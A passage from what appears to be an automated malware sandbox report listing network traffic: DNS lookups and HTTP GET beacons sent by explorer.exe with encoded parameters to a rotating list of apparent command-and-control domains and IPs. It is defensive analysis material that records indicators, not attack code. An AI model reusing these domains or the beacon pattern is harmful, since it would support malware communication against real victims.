Apr 8, 2021 12:40:35.386240959 CEST | 80 | 49740 | 199.59.242.153 | 192.168.2.5
Apr 8, 2021 12:40:35.386388063 CEST | 49740 | 80 | 192.168.2.5 | 199.59.242.153

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 8, 2021 12:38:26.247538090 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:38:26.260879993 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:38:26.273617983 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:38:26.285798073 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:38:27.458818913 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:38:27.472127914 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:38:28.604650021 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:38:28.617782116 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:38:49.686887980 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:38:49.699250937 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:38:56.115886927 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:38:56.134406090 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:38:58.509546995 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:38:58.521975994 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:39:13.537167072 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:39:13.549674988 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:39:14.323939085 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:39:14.336870909 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:39:15.621750116 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:39:15.634660959 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:39:19.062145948 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:39:19.080125093 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:39:20.729530096 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:39:20.742737055 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:39:22.085884094 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:39:22.098853111 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:39:26.312537909 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:39:26.325992107 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:39:27.818598986 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:39:27.830636978 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:39:35.325081110 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:39:35.342953920 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:39:39.375530005 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:39:39.407577038 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:39:40.657305956 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:39:40.784033060 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:39:46.044650078 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:39:46.079361916 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:39:51.187709093 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:39:51.221622944 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:39:56.654994965 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:39:56.925231934 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:40:01.939572096 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:40:01.988320112 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:40:07.084477901 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:40:07.238924980 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:40:09.922626972 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:40:09.938190937 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:40:11.770804882 CEST | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:40:11.785527945 CEST | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:40:12.928857088 CEST | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:40:12.952780008 CEST | 53 | 57344 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:40:18.093121052 CEST | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:40:18.154184103 CEST | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:40:24.560899973 CEST | 59261 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:40:24.595102072 CEST | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:40:29.715652943 CEST | 57151 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:40:29.739094973 CEST | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:40:35.046875954 CEST | 59413 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:40:35.161880970 CEST | 53 | 59413 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:40:40.403029919 CEST | 60516 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:40:40.748974085 CEST | 53 | 60516 | 8.8.8.8 | 192.168.2.5
Apr 8, 2021 12:40:46.672671080 CEST | 51649 | 53 | 192.168.2.5 | 8.8.8.8
Apr 8, 2021 12:40:47.159715891 CEST | 53 | 51649 | 8.8.8.8 | 192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 12:39:40.657305956 CEST | 192.168.2.5 | 8.8.8.8 | 0xb1c4 | Standard query (0) | www.abolishlawinforcement.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:39:46.044650078 CEST | 192.168.2.5 | 8.8.8.8 | 0x2141 | Standard query (0) | www.webinast.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:39:51.187709093 CEST | 192.168.2.5 | 8.8.8.8 | 0x25ba | Standard query (0) | www.puebloregentseniorliving.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:39:56.654994965 CEST | 192.168.2.5 | 8.8.8.8 | 0xd7fd | Standard query (0) | www.anchor-little.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:40:01.939572096 CEST | 192.168.2.5 | 8.8.8.8 | 0x4d33 | Standard query (0) | www.brandschutzglas.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:40:07.084477901 CEST | 192.168.2.5 | 8.8.8.8 | 0x5035 | Standard query (0) | www.hispanicalinguablog.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:40:12.928857088 CEST | 192.168.2.5 | 8.8.8.8 | 0xe779 | Standard query (0) | www.unmanglement.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:40:18.093121052 CEST | 192.168.2.5 | 8.8.8.8 | 0x9edb | Standard query (0) | www.plataformaporelmarcanario.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:40:24.560899973 CEST | 192.168.2.5 | 8.8.8.8 | 0x8fd | Standard query (0) | www.dajiangzhibo12.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:40:29.715652943 CEST | 192.168.2.5 | 8.8.8.8 | 0x99ca | Standard query (0) | www.saturnkorp.net | A (IP address) | IN (0x0001)
Apr 8, 2021 12:40:35.046875954 CEST | 192.168.2.5 | 8.8.8.8 | 0xfaf9 | Standard query (0) | www.sgdivergence.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:40:40.403029919 CEST | 192.168.2.5 | 8.8.8.8 | 0xb87 | Standard query (0) | www.weatherdekniagara.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:40:46.672671080 CEST | 192.168.2.5 | 8.8.8.8 | 0x9491 | Standard query (0) | www.vtz6whu5254xb1.xyz | A (IP address) | IN (0x0001)

                                                                DNS Answers

                                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                Apr 8, 2021 12:39:40.784033060 CEST | 8.8.8.8 | 192.168.2.5 | 0xb1c4 | No error (0) | www.abolishlawinforcement.com | | 66.96.162.131 | A (IP address) | IN (0x0001)
                                                                Apr 8, 2021 12:39:46.079361916 CEST | 8.8.8.8 | 192.168.2.5 | 0x2141 | No error (0) | www.webinast.com | webinast.com | | CNAME (Canonical name) | IN (0x0001)
                                                                Apr 8, 2021 12:39:46.079361916 CEST | 8.8.8.8 | 192.168.2.5 | 0x2141 | No error (0) | webinast.com | | 35.214.93.182 | A (IP address) | IN (0x0001)
                                                                Apr 8, 2021 12:39:51.221622944 CEST | 8.8.8.8 | 192.168.2.5 | 0x25ba | No error (0) | www.puebloregentseniorliving.com | puebloregentseniorliving.com | | CNAME (Canonical name) | IN (0x0001)
                                                                Apr 8, 2021 12:39:51.221622944 CEST | 8.8.8.8 | 192.168.2.5 | 0x25ba | No error (0) | puebloregentseniorliving.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
                                                                Apr 8, 2021 12:39:56.925231934 CEST | 8.8.8.8 | 192.168.2.5 | 0xd7fd | Name error (3) | www.anchor-little.com | none | none | A (IP address) | IN (0x0001)
                                                                Apr 8, 2021 12:40:01.988320112 CEST | 8.8.8.8 | 192.168.2.5 | 0x4d33 | No error (0) | www.brandschutzglas.com | | 81.19.159.73 | A (IP address) | IN (0x0001)
                                                                Apr 8, 2021 12:40:07.238924980 CEST | 8.8.8.8 | 192.168.2.5 | 0x5035 | No error (0) | www.hispanicalinguablog.com | hispanicalinguablog.com | | CNAME (Canonical name) | IN (0x0001)
                                                                Apr 8, 2021 12:40:07.238924980 CEST | 8.8.8.8 | 192.168.2.5 | 0x5035 | No error (0) | hispanicalinguablog.com | | 108.167.140.96 | A (IP address) | IN (0x0001)
                                                                Apr 8, 2021 12:40:12.952780008 CEST | 8.8.8.8 | 192.168.2.5 | 0xe779 | No error (0) | www.unmanglement.com | unmanglement.com | | CNAME (Canonical name) | IN (0x0001)
                                                                Apr 8, 2021 12:40:12.952780008 CEST | 8.8.8.8 | 192.168.2.5 | 0xe779 | No error (0) | unmanglement.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                                Apr 8, 2021 12:40:18.154184103 CEST | 8.8.8.8 | 192.168.2.5 | 0x9edb | No error (0) | www.plataformaporelmarcanario.com | | 52.142.208.184 | A (IP address) | IN (0x0001)
                                                                Apr 8, 2021 12:40:24.595102072 CEST | 8.8.8.8 | 192.168.2.5 | 0x8fd | No error (0) | www.dajiangzhibo12.com | | 104.21.85.234 | A (IP address) | IN (0x0001)
                                                                Apr 8, 2021 12:40:24.595102072 CEST | 8.8.8.8 | 192.168.2.5 | 0x8fd | No error (0) | www.dajiangzhibo12.com | | 172.67.212.23 | A (IP address) | IN (0x0001)
                                                                Apr 8, 2021 12:40:29.739094973 CEST | 8.8.8.8 | 192.168.2.5 | 0x99ca | No error (0) | www.saturnkorp.net | | 75.126.101.233 | A (IP address) | IN (0x0001)
                                                                Apr 8, 2021 12:40:35.161880970 CEST | 8.8.8.8 | 192.168.2.5 | 0xfaf9 | No error (0) | www.sgdivergence.com | | 199.59.242.153 | A (IP address) | IN (0x0001)
                                                                Apr 8, 2021 12:40:40.748974085 CEST | 8.8.8.8 | 192.168.2.5 | 0xb87 | No error (0) | www.weatherdekniagara.com | | 154.90.117.58 | A (IP address) | IN (0x0001)
                                                                Apr 8, 2021 12:40:47.159715891 CEST | 8.8.8.8 | 192.168.2.5 | 0x9491 | No error (0) | www.vtz6whu5254xb1.xyz | | 49.156.179.238 | A (IP address) | IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • www.abolishlawinforcement.com
                                                                • www.webinast.com
                                                                • www.puebloregentseniorliving.com
                                                                • www.brandschutzglas.com
                                                                • www.hispanicalinguablog.com
                                                                • www.unmanglement.com
                                                                • www.plataformaporelmarcanario.com
                                                                • www.dajiangzhibo12.com
                                                                • www.saturnkorp.net
                                                                • www.sgdivergence.com

                                                                HTTP Packets

                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                0 | 192.168.2.5 | 49729 | 66.96.162.131 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 8, 2021 12:39:40.904516935 CEST | 5495 | OUT | GET /c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.abolishlawinforcement.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:39:41.035171032 CEST | 5498 | IN | HTTP/1.1 302 Found
                                                                Date: Thu, 08 Apr 2021 10:39:40 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Content-Length: 323
                                                                Connection: close
                                                                Server: Apache/2
                                                                Location: https://www.abolishlawinforcement.com/c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m
                                                                Cache-Control: max-age=3600
                                                                Expires: Thu, 08 Apr 2021 11:39:40 GMT
                                                                Accept-Ranges: bytes
                                                                Age: 0
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 62 6f 6c 69 73 68 6c 61 77 69 6e 66 6f 72 63 65 6d 65 6e 74 2e 63 6f 6d 2f 63 32 32 62 2f 3f 47 50 69 38 3d 31 64 51 61 61 44 74 4c 6f 34 68 49 6c 68 4a 37 44 68 4d 38 30 47 43 76 50 38 2f 49 38 43 58 31 39 44 30 2f 39 41 73 50 57 54 53 4d 35 41 34 59 31 33 38 64 4b 6a 4f 6c 41 4e 55 67 71 5a 36 32 35 41 37 63 26 61 6d 70 3b 61 72 79 3d 74 58 4c 70 7a 68 46 70 67 42 6a 34 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.abolishlawinforcement.com/c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&amp;ary=tXLpzhFpgBj4m">here</a>.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                1 | 192.168.2.5 | 49730 | 35.214.93.182 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 8, 2021 12:39:46.122944117 CEST | 5504 | OUT | GET /c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.webinast.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:39:46.172902107 CEST | 5505 | IN | HTTP/1.1 301 Moved Permanently
                                                                Server: nginx
                                                                Date: Thu, 08 Apr 2021 10:39:46 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Content-Length: 334
                                                                Connection: close
                                                                Location: https://www.webinast.com/c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4m
                                                                Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                                X-Proxy-Cache: MISS
                                                                X-Proxy-Cache-Info: 0 NC:000000 UP:
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 62 69 6e 61 73 74 2e 63 6f 6d 2f 63 32 32 62 2f 3f 47 50 69 38 3d 31 57 59 46 50 43 46 41 61 2b 6a 70 48 49 42 39 42 6e 49 4c 55 34 43 30 36 71 71 35 70 47 68 76 4c 73 52 57 62 67 42 61 38 68 2f 64 6e 37 66 62 52 44 79 2b 41 39 66 58 31 46 69 30 4a 62 37 77 6f 58 72 65 26 61 6d 70 3b 61 72 79 3d 74 58 4c 70 7a 68 46 70 67 42 6a 34 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.webinast.com/c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&amp;ary=tXLpzhFpgBj4m">here</a>.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                2 | 192.168.2.5 | 49731 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 8, 2021 12:39:51.402147055 CEST | 5506 | OUT | GET /c22b/?GPi8=nmIfUlNr6AQSQgrNMPV2VDC5u2FNL4+2gZJ90khVvz7x9MdM6XesChhiT43O23KpZGxC&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.puebloregentseniorliving.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:39:51.606599092 CEST | 5506 | IN | HTTP/1.1 301 Moved Permanently
                                                                Server: nginx/1.16.1
                                                                Date: Thu, 08 Apr 2021 10:39:51 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Location: https://www.holidayseniorliving.com/senior-apartments/colorado/pueblo-regent?GPi8=nmIfUlNr6AQSQgrNMPV2VDC5u2FNL4+2gZJ90khVvz7x9MdM6XesChhiT43O23KpZGxC&ary=tXLpzhFpgBj4m
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                3 | 192.168.2.5 | 49732 | 81.19.159.73 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 8, 2021 12:40:02.025681973 CEST | 5507 | OUT | GET /c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.brandschutzglas.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:40:02.060216904 CEST | 5508 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Thu, 08 Apr 2021 10:40:02 GMT
                                                                Server: Apache
                                                                Location: https://www.brandschutzglas.com/c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4m
                                                                Content-Length: 341
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 72 61 6e 64 73 63 68 75 74 7a 67 6c 61 73 2e 63 6f 6d 2f 63 32 32 62 2f 3f 47 50 69 38 3d 33 65 38 67 77 6b 6c 39 4e 54 72 77 51 45 4a 49 64 74 63 2f 4f 49 51 57 2f 48 5a 57 6e 59 59 79 6a 5a 39 79 79 58 34 49 6a 36 62 45 74 79 54 37 42 6d 68 6d 67 52 30 37 32 47 79 67 64 4e 2b 78 4f 56 66 4d 26 61 6d 70 3b 61 72 79 3d 74 58 4c 70 7a 68 46 70 67 42 6a 34 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.brandschutzglas.com/c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&amp;ary=tXLpzhFpgBj4m">here</a>.</p></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                4 | 192.168.2.5 | 49733 | 108.167.140.96 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 8, 2021 12:40:07.392082930 CEST | 5509 | OUT | GET /c22b/?GPi8=HpleEjmznmAp1mnh3ErPpAEFAwO205ds9NqRbSfPQGhA2yUrvNOqRplXRPY5sqn9sB27&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.hispanicalinguablog.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:40:08.338521957 CEST | 5510 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Thu, 08 Apr 2021 10:40:08 GMT
                                                                Server: nginx/1.19.5
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 0
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                X-Redirect-By: WordPress
                                                                Location: http://hispanicalinguablog.com/c22b/?GPi8=HpleEjmznmAp1mnh3ErPpAEFAwO205ds9NqRbSfPQGhA2yUrvNOqRplXRPY5sqn9sB27&ary=tXLpzhFpgBj4m
                                                                X-Endurance-Cache-Level: 2
                                                                X-Server-Cache: true
                                                                X-Proxy-Cache: MISS


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                5 | 192.168.2.5 | 49736 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 8, 2021 12:40:12.968741894 CEST | 5530 | OUT | GET /c22b/?GPi8=SZiv1CvNDlpERXMbnn5ZLbcWCJQi367u53ErGxikwJhkUqcV+jft+FDyZI7mP4A7IH+s&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.unmanglement.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:40:13.082386017 CEST | 5530 | IN | HTTP/1.1 403 Forbidden
                                                                Server: openresty
                                                                Date: Thu, 08 Apr 2021 10:40:13 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 275
                                                                ETag: "6063a886-113"
                                                                Via: 1.1 google
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                6 | 192.168.2.5 | 49737 | 52.142.208.184 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 8, 2021 12:40:18.180222988 CEST | 5531 | OUT | GET /c22b/?GPi8=zx0k4ABwBL0XDo/z29LcJNBul5/He8j/Xs403vcVS0JFFGbo2Kaumu3jNTCDwIeMd1g7&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.plataformaporelmarcanario.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                7 | 192.168.2.5 | 49738 | 104.21.85.234 | 80 | C:\Windows\explorer.exe
                                                                Timestamp | kBytes transferred | Direction | Data
                                                                Apr 8, 2021 12:40:24.619865894 CEST | 5532 | OUT | GET /c22b/?GPi8=5+EjqSxxsqb+AO0KDJIwjNuki1nPzn2WfN0f4mrczTU8JzwykOabyZiChtG34yjy1Q0j&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.dajiangzhibo12.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:40:24.656661034 CEST | 5533 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Thu, 08 Apr 2021 10:40:24 GMT
